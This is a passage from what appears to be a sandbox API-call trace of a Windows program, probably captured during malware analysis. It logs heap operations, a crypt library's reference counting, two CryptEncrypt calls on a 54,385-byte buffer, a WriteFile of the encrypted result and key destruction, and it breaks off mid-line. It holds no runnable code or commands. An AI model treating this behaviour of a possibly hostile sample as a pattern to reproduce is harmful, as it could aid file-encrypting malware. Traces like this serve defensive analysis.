[0076.685] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2690 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.685] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca670 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.685] PeekMessageW (in: lpMsg=0x144e734, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e734) returned 0 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.685] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0076.686] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.686] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca580 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.686] PeekMessageW (in: lpMsg=0x144e8fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e8fc) returned 0 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea508 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0076.686] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0076.686] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0076.686] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.688] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43caa30, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.688] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x144e790*=0xd46d, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x144e790*=0xd470) returned 1 [0076.688] CharLowerBuffW (in: lpsz="byte[54385]", cchLength=0xb | out: lpsz="byte[54385]") returned 0xb [0076.689] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.689] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0076.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x43cac58, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0076.690] CryptEncrypt (in: hKey=0x41ac540, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4917db0*, pdwDataLen=0x144e790*=0xd46d, dwBufLen=0xd470 | out: pbData=0x4917db0*, pdwDataLen=0x144e790*=0xd470) returned 1 [0076.690] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.690] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.692] WriteFile (in: hFile=0x258, lpBuffer=0x499a008*, nNumberOfBytesToWrite=0xd470, lpNumberOfBytesWritten=0x144f194, lpOverlapped=0x0 | out: lpBuffer=0x499a008*, lpNumberOfBytesWritten=0x144f194*=0xd470, lpOverlapped=0x0) returned 1 [0076.695] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0076.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.695] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.695] CryptDestroyKey (hKey=0x41ac540) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0076.695] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.696] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0076.696] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0076.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0076.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.697] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea508 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.698] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0076.698] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.698] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.698] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a10 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0076.698] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0076.699] PeekMessageW (in: lpMsg=0x144eb0c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb0c) returned 0 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0076.699] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0076.699] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0076.699] PeekMessageW (in: lpMsg=0x144ed64, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ed64) returned 0 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.699] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0076.699] PeekMessageW (in: lpMsg=0x144efbc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144efbc) returned 0 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfab8 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa90 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9a40 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0076.700] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1f0 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0076.701] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0076.701] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf860 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0076.701] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0076.701] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca268 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca370 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0076.702] PeekMessageW (in: lpMsg=0x144ee2c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ee2c) returned 0 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8be8 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0076.702] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0076.702] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.702] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27d0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0076.703] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.703] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391af0 | out: hHeap=0x1780000) returned 1 [0076.703] HeapFree (in: 